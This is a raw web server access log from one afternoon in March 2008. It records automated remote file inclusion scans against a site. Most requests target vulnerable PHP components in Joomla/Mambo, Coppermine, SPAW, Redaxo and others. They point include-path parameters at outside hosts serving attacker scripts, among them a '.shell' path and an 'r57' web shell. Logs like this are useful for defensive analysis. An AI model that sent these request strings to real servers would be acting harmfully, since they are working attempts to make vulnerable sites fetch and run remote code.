189.19.255.240 - - [30/Mar/2008:17:01:00 -0700] "GET /logs/access_071217.log/index.php?x=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:17:01:01 -0700] "GET /index.php?x=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:17:01:02 -0700] "GET /logs/index.php?x=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.135.90 - - [30/Mar/2008:17:01:32 -0700] "GET /logs/access_071105.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.135.90 - - [30/Mar/2008:17:01:32 -0700] "GET /logs/access_071105.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.135.90 - - [30/Mar/2008:17:01:32 -0700] "GET /logs/access_071105.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.135.90 - - [30/Mar/2008:17:01:32 -0700] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.135.90 - - [30/Mar/2008:17:01:32 -0700] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.135.90 - - [30/Mar/2008:17:01:32 -0700] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.135.90 - - [30/Mar/2008:17:01:32 -0700] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.135.90 - - [30/Mar/2008:17:01:32 -0700] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.135.90 - - [30/Mar/2008:17:01:32 -0700] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.135.90 - - [30/Mar/2008:17:01:33 -0700] "GET /logs/access_071105.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.135.90 - - [30/Mar/2008:17:01:33 -0700] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.135.90 - - [30/Mar/2008:17:01:33 -0700] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.246.65 - - [30/Mar/2008:17:02:07 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
62.193.246.65 - - [30/Mar/2008:17:02:13 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
205.234.213.67 - - [30/Mar/2008:17:02:17 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.16.184 - - [30/Mar/2008:17:02:52 -0700] "GET /logs/access_071105.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
205.234.213.67 - - [30/Mar/2008:17:02:55 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.131.61 - - [30/Mar/2008:17:02:59 -0700] "GET /errors.php?error=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
207.58.131.61 - - [30/Mar/2008:17:02:59 -0700] "GET /logs/errors.php?error=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
209.172.57.15 - - [30/Mar/2008:17:03:04 -0700] "GET //redaxo/include/addons.inc.php?REX[INCLUDE_PATH]=http://www.nswshop.com/sitemap/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
209.172.57.15 - - [30/Mar/2008:17:03:04 -0700] "GET /logs//redaxo/include/addons.inc.php?REX[INCLUDE_PATH]=http://www.nswshop.com/sitemap/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
67.15.78.65 - - [30/Mar/2008:17:03:22 -0700] "GET /http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
67.15.78.65 - - [30/Mar/2008:17:03:25 -0700] "GET /logs/http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
69.90.114.126 - - [30/Mar/2008:17:04:06 -0700] "GET /logs/access_080113.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.90.114.126 - - [30/Mar/2008:17:04:06 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.216.189 - - [30/Mar/2008:17:04:58 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
62.75.216.189 - - [30/Mar/2008:17:04:58 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
62.193.224.190 - - [30/Mar/2008:17:05:18 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
190.10.90.190 - - [30/Mar/2008:17:05:53 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)" "www.galf.org"
80.249.117.99 - - [30/Mar/2008:17:06:07 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
80.249.117.99 - - [30/Mar/2008:17:06:07 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
69.90.114.126 - - [30/Mar/2008:17:07:10 -0700] "GET /logs/access_071217.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:17:07:58 -0700] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:17:07:58 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:17:07:58 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.40.65.240 - - [30/Mar/2008:17:08:02 -0700] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.40.65.240 - - [30/Mar/2008:17:08:02 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.40.65.240 - - [30/Mar/2008:17:08:02 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.216.189 - - [30/Mar/2008:17:08:08 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
62.75.216.189 - - [30/Mar/2008:17:08:08 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:17:08:27 -0700] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:17:08:27 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:17:08:27 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.75.216.189 - - [30/Mar/2008:17:08:41 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:17:08:51 -0700] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:17:08:51 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:17:08:51 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:17:09:13 -0700] "GET /logs/access_080113.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.40.65.240 - - [30/Mar/2008:17:09:41 -0700] "GET /logs/access_080113.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:17:09:48 -0700] "GET /logs/access_080113.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:17:09:59 -0700] "GET /logs/access_070716.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:17:09:59 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:17:09:59 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:17:10:19 -0700] "GET /logs/access_080113.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.3.249.71 - - [30/Mar/2008:17:10:29 -0700] "GET /includes/settings.inc.php?include_path=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
72.3.249.71 - - [30/Mar/2008:17:10:29 -0700] "GET /logs/includes/settings.inc.php?include_path=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:17:11:22 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:17:11:23 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.111.173.76 - - [30/Mar/2008:17:11:55 -0700] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.173.76 - - [30/Mar/2008:17:11:56 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.173.76 - - [30/Mar/2008:17:11:56 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.37.186.93 - - [30/Mar/2008:17:11:58 -0700] "GET /logs/access_071203.log/mcf.php?content=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.37.186.93 - - [30/Mar/2008:17:11:59 -0700] "GET /mcf.php?content=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.37.186.93 - - [30/Mar/2008:17:12:00 -0700] "GET /logs/mcf.php?content=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.40.65.240 - - [30/Mar/2008:17:12:35 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.40.65.240 - - [30/Mar/2008:17:12:35 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.37.186.93 - - [30/Mar/2008:17:12:54 -0700] "GET /mcf.php?content=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:17:13:16 -0700] "GET /logs/access_070716.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:17:13:17 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:17:13:17 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:17:13:33 -0700] "GET /logs/access_071112.log//Neos_Chronos/header.php?base_folder=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:17:13:37 -0700] "GET //Neos_Chronos/header.php?base_folder=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:17:13:40 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
89.107.66.224 - - [30/Mar/2008:17:13:41 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://autogg.it/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
89.107.66.224 - - [30/Mar/2008:17:13:41 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://autogg.it/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:17:13:46 -0700] "GET /logs/access_080113.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.40.65.240 - - [30/Mar/2008:17:13:56 -0700] "GET /logs/access_070820.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:17:14:10 -0700] "GET /logs/access_070716.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:17:14:11 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:17:14:11 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.173.76 - - [30/Mar/2008:17:14:18 -0700] "GET /logs/access_080113.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:17:14:33 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:17:14:33 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:17:14:34 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:17:14:52 -0700] "GET /logs/access_071014.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:17:14:58 -0700] "GET /logs/access_070820.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:17:15:01 -0700] "GET /logs/access_080225.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:17:15:04 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:17:15:08 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:17:15:21 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:17:15:22 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:17:15:22 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:17:15:27 -0700] "GET /logs/access_070820.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:17:15:41 -0700] "GET /logs/access_071014.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.15.133.133 - - [30/Mar/2008:17:16:21 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
204.15.133.133 - - [30/Mar/2008:17:16:21 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
213.219.217.74 - - [30/Mar/2008:17:16:27 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.smdserv001.co.uk/cwfm/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
213.219.217.74 - - [30/Mar/2008:17:16:27 -0700] "GET //skin/zero_vote/error.php?dir=http://www.smdserv001.co.uk/cwfm/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
194.145.175.68 - - [30/Mar/2008:17:17:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.victoriakart.ru/usr/extensions/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
194.145.175.68 - - [30/Mar/2008:17:17:04 -0700] "GET //skin/zero_vote/error.php?dir=http://www.victoriakart.ru/usr/extensions/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
80.249.117.99 - - [30/Mar/2008:17:17:30 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
80.249.117.99 - - [30/Mar/2008:17:17:31 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:17:18:37 -0700] "GET /logs/access_071231.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.249.117.99 - - [30/Mar/2008:17:18:58 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
80.249.117.99 - - [30/Mar/2008:17:18:58 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
87.118.102.153 - - [30/Mar/2008:17:19:43 -0700] "GET /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
87.118.102.153 - - [30/Mar/2008:17:19:44 -0700] "GET /logs/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
